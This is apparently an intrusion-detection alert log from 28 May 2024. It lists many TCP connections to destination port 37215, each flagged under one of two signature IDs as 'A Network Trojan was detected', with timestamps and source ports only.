            Timestamp:05/28/24-09:57:14.778638
            SID:2835222
            Source Port:41336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771702
            SID:2835222
            Source Port:35354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597634
            SID:2829579
            Source Port:55728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.403366
            SID:2829579
            Source Port:58262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.873266
            SID:2829579
            Source Port:59894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919110
            SID:2829579
            Source Port:35538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706560
            SID:2829579
            Source Port:49156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778716
            SID:2835222
            Source Port:35038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.060414
            SID:2835222
            Source Port:36524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.230938
            SID:2835222
            Source Port:45330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862992
            SID:2829579
            Source Port:38348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309528
            SID:2835222
            Source Port:60684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807479
            SID:2835222
            Source Port:60804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878926
            SID:2835222
            Source Port:56830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778329
            SID:2835222
            Source Port:55876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857747
            SID:2829579
            Source Port:56616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994837
            SID:2829579
            Source Port:49140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.686023
            SID:2835222
            Source Port:41858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.973929
            SID:2829579
            Source Port:45332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972015
            SID:2835222
            Source Port:42568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910118
            SID:2829579
            Source Port:60264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052254
            SID:2835222
            Source Port:47884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.932016
            SID:2829579
            Source Port:58868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730979
            SID:2829579
            Source Port:45408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905100
            SID:2835222
            Source Port:54156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999474
            SID:2835222
            Source Port:38038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058439
            SID:2835222
            Source Port:60590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.803925
            SID:2829579
            Source Port:40604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869822
            SID:2835222
            Source Port:46522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.802136
            SID:2835222
            Source Port:45252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437245
            SID:2829579
            Source Port:52790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.069482
            SID:2835222
            Source Port:47428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988237
            SID:2829579
            Source Port:45902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952796
            SID:2835222
            Source Port:55052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005223
            SID:2835222
            Source Port:45348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371334
            SID:2829579
            Source Port:38034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777038
            SID:2835222
            Source Port:56890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.861064
            SID:2835222
            Source Port:40014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563462
            SID:2829579
            Source Port:57646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.817567
            SID:2835222
            Source Port:44294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855089
            SID:2829579
            Source Port:54400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.073149
            SID:2829579
            Source Port:41724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837532
            SID:2835222
            Source Port:48002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.516410
            SID:2835222
            Source Port:43560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923222
            SID:2835222
            Source Port:49148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060331
            SID:2829579
            Source Port:44646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778468
            SID:2835222
            Source Port:37460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.182817
            SID:2835222
            Source Port:45656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.681547
            SID:2829579
            Source Port:44288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968475
            SID:2835222
            Source Port:49946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.711083
            SID:2829579
            Source Port:46332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068575
            SID:2829579
            Source Port:45584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541234
            SID:2835222
            Source Port:46192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597019
            SID:2835222
            Source Port:34400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.744338
            SID:2829579
            Source Port:39902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827628
            SID:2835222
            Source Port:38306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423300
            SID:2835222
            Source Port:49374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562231
            SID:2829579
            Source Port:52490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.009169
            SID:2829579
            Source Port:35874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.861479
            SID:2829579
            Source Port:51008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.025423
            SID:2835222
            Source Port:34678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862656
            SID:2829579
            Source Port:33138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759913
            SID:2829579
            Source Port:58758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782501
            SID:2835222
            Source Port:37012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.000898
            SID:2829579
            Source Port:46306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508104
            SID:2835222
            Source Port:46828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.564032
            SID:2829579
            Source Port:39548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.444178
            SID:2835222
            Source Port:53208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905823
            SID:2835222
            Source Port:55552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776876
            SID:2829579
            Source Port:49272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887890
            SID:2829579
            Source Port:53994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821884
            SID:2829579
            Source Port:55604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853212
            SID:2829579
            Source Port:54088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060074
            SID:2829579
            Source Port:45382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279422
            SID:2829579
            Source Port:37352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953380
            SID:2829579
            Source Port:35382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899274
            SID:2829579
            Source Port:53318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786603
            SID:2835222
            Source Port:60940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.920142
            SID:2829579
            Source Port:42320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.511055
            SID:2835222
            Source Port:56600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333247
            SID:2829579
            Source Port:37440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057307
            SID:2829579
            Source Port:57548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.446536
            SID:2829579
            Source Port:59390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809165
            SID:2835222
            Source Port:46410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.856313
            SID:2835222
            Source Port:37826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994600
            SID:2829579
            Source Port:50662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543990
            SID:2835222
            Source Port:44614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031310
            SID:2835222
            Source Port:56810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927712
            SID:2835222
            Source Port:49288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.380229
            SID:2835222
            Source Port:34424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.047995
            SID:2835222
            Source Port:34386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759602
            SID:2835222
            Source Port:35204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.722136
            SID:2835222
            Source Port:48152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059828
            SID:2829579
            Source Port:32960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.762413
            SID:2829579
            Source Port:51188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376743
            SID:2829579
            Source Port:60202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919712
            SID:2829579
            Source Port:58120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837868
            SID:2829579
            Source Port:33612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880586
            SID:2835222
            Source Port:37244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336584
            SID:2835222
            Source Port:57790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542643
            SID:2829579
            Source Port:58368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290487
            SID:2835222
            Source Port:39206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999036
            SID:2829579
            Source Port:36624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885580
            SID:2829579
            Source Port:54850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.312289
            SID:2829579
            Source Port:45752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.970012
            SID:2829579
            Source Port:37130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299655
            SID:2829579
            Source Port:34090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.573506
            SID:2835222
            Source Port:32872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.515854
            SID:2829579
            Source Port:32982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047384
            SID:2829579
            Source Port:34448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052825
            SID:2835222
            Source Port:59190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.084106
            SID:2829579
            Source Port:39110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334127
            SID:2835222
            Source Port:33446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979623
            SID:2829579
            Source Port:34154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435225
            SID:2835222
            Source Port:36872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804470
            SID:2829579
            Source Port:55602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827476
            SID:2835222
            Source Port:57030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893115
            SID:2835222
            Source Port:51212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.933827
            SID:2835222
            Source Port:52026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811958
            SID:2835222
            Source Port:49426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951375
            SID:2829579
            Source Port:38220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605312
            SID:2829579
            Source Port:44284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.946888
            SID:2835222
            Source Port:59094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507472
            SID:2829579
            Source Port:49590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930108
            SID:2829579
            Source Port:56948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.441454
            SID:2829579
            Source Port:59672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556825
            SID:2835222
            Source Port:49210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605213
            SID:2829579
            Source Port:48128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581051
            SID:2829579
            Source Port:56438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.474307
            SID:2829579
            Source Port:36142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508087
            SID:2835222
            Source Port:40946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.457526
            SID:2835222
            Source Port:56840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.261811
            SID:2829579
            Source Port:36858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665904
            SID:2835222
            Source Port:47954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903537
            SID:2835222
            Source Port:58990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825380
            SID:2835222
            Source Port:57010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918239
            SID:2835222
            Source Port:53906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.938806
            SID:2829579
            Source Port:51746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542744
            SID:2829579
            Source Port:45030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.170023
            SID:2829579
            Source Port:34832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510439
            SID:2829579
            Source Port:39506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543124
            SID:2835222
            Source Port:49472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849661
            SID:2829579
            Source Port:45194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.870861
            SID:2829579
            Source Port:60612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470081
            SID:2829579
            Source Port:54690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.897636
            SID:2829579
            Source Port:36822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776650
            SID:2829579
            Source Port:48600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.018818
            SID:2835222
            Source Port:36604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.814837
            SID:2829579
            Source Port:41438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058120
            SID:2835222
            Source Port:47678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880137
            SID:2835222
            Source Port:49164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506767
            SID:2829579
            Source Port:38338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.482878
            SID:2835222
            Source Port:42436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323107
            SID:2835222
            Source Port:59440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.413080
            SID:2835222
            Source Port:43012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727749
            SID:2829579
            Source Port:34914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.315376
            SID:2835222
            Source Port:55324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931015
            SID:2829579
            Source Port:53022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894154
            SID:2835222
            Source Port:58112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846591
            SID:2835222
            Source Port:60366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.742093
            SID:2835222
            Source Port:55368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.912589
            SID:2829579
            Source Port:60660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.187525
            SID:2835222
            Source Port:56278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543316
            SID:2829579
            Source Port:37988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.996296
            SID:2835222
            Source Port:33594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.356982
            SID:2835222
            Source Port:60130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.488953
            SID:2835222
            Source Port:53486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.942419
            SID:2829579
            Source Port:51008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052442
            SID:2835222
            Source Port:34048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.437081
            SID:2829579
            Source Port:35574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308057
            SID:2829579
            Source Port:48550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065587
            SID:2835222
            Source Port:58562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303782
            SID:2829579
            Source Port:41886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307568
            SID:2829579
            Source Port:60524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.862158
            SID:2835222
            Source Port:48616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924849
            SID:2835222
            Source Port:59246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984541
            SID:2835222
            Source Port:38160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730177
            SID:2835222
            Source Port:45810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779459
            SID:2835222
            Source Port:54430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.342251
            SID:2829579
            Source Port:39918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.034937
            SID:2835222
            Source Port:48932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333162
            SID:2829579
            Source Port:52190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935292
            SID:2835222
            Source Port:47434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542687
            SID:2829579
            Source Port:37020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.063605
            SID:2835222
            Source Port:40426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952562
            SID:2835222
            Source Port:37904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557431
            SID:2829579
            Source Port:50334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.841483
            SID:2829579
            Source Port:40252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827999
            SID:2829579
            Source Port:54158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.319156
            SID:2829579
            Source Port:56406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.147544
            SID:2829579
            Source Port:34850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849812
            SID:2829579
            Source Port:57914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.834105
            SID:2835222
            Source Port:44402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.092269
            SID:2835222
            Source Port:52020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575017
            SID:2835222
            Source Port:40542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832715
            SID:2835222
            Source Port:46916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.933436
            SID:2835222
            Source Port:48562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639853
